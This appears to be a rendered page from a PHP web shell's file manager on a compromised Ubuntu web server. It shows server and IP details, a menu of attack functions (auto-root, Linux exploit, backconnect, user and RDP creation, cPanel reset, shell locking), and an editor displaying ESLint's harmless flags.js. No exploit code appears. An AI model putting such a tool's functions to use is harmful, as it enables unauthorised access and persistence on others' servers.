Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
eslint /
lib /
shared /
[ HOME SHELL ]
Name
Size
Permission
Action
ajv.js
931
B
-rw-r--r--
assert.js
524
B
-rw-r--r--
ast-utils.js
897
B
-rw-r--r--
deep-merge-arrays.js
1.54
KB
-rw-r--r--
directives.js
413
B
-rw-r--r--
flags.js
2.66
KB
-rw-r--r--
logging.js
635
B
-rw-r--r--
naming.js
2.88
KB
-rw-r--r--
option-utils.js
1.24
KB
-rw-r--r--
relative-module-resolver.js
1
KB
-rw-r--r--
runtime-info.js
5.02
KB
-rw-r--r--
serialization.js
2.06
KB
-rw-r--r--
severity.js
1.15
KB
-rw-r--r--
stats.js
638
B
-rw-r--r--
string-utils.js
1.51
KB
-rw-r--r--
text-table.js
2.16
KB
-rw-r--r--
traverser.js
4.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : flags.js
/** * @fileoverview Shared flags for ESLint. */ "use strict"; //------------------------------------------------------------------------------ // Typedefs //------------------------------------------------------------------------------ /** * @typedef {Object} InactiveFlagData * @property {string} description Flag description * @property {string | null} [replacedBy] Can be either: * - An active flag (string) that enables the same feature. * - `null` if the feature is now enabled by default. * - Omitted if the feature has been abandoned. */ //----------------------------------------------------------------------------- // Exports //----------------------------------------------------------------------------- /** * The set of flags that change ESLint behavior with a description. * @type {Map<string, string>} */ const activeFlags = new Map([ ["test_only", "Used only for testing."], ["test_only_2", "Used only for testing."], [ "v10_config_lookup_from_file", "Look up `eslint.config.js` from the file being linted.", ], [ "unstable_native_nodejs_ts_config", "Use native Node.js to load TypeScript configuration.", ], ]); /** * The set of flags that used to be active. * @type {Map<string, InactiveFlagData>} */ const inactiveFlags = new Map([ [ "test_only_replaced", { description: "Used only for testing flags that have been replaced by other flags.", replacedBy: "test_only", }, ], [ "test_only_enabled_by_default", { description: "Used only for testing flags whose features have been enabled by default.", replacedBy: null, }, ], [ "test_only_abandoned", { description: "Used only for testing flags whose features have been abandoned.", }, ], [ "unstable_ts_config", { description: "Enable TypeScript configuration files.", replacedBy: null, }, ], [ "unstable_config_lookup_from_file", { description: "Look up `eslint.config.js` from the file being linted.", replacedBy: "v10_config_lookup_from_file", }, ], ]); /** * Creates a message that describes the reason the flag is inactive. * @param {InactiveFlagData} inactiveFlagData Data for the inactive flag. * @returns {string} Message describing the reason the flag is inactive. */ function getInactivityReasonMessage({ replacedBy }) { if (typeof replacedBy === "undefined") { return "This feature has been abandoned."; } if (typeof replacedBy === "string") { return `This flag has been renamed '${replacedBy}' to reflect its stabilization. Please use '${replacedBy}' instead.`; } // null return "This feature is now enabled by default."; } module.exports = { activeFlags, inactiveFlags, getInactivityReasonMessage, };
Close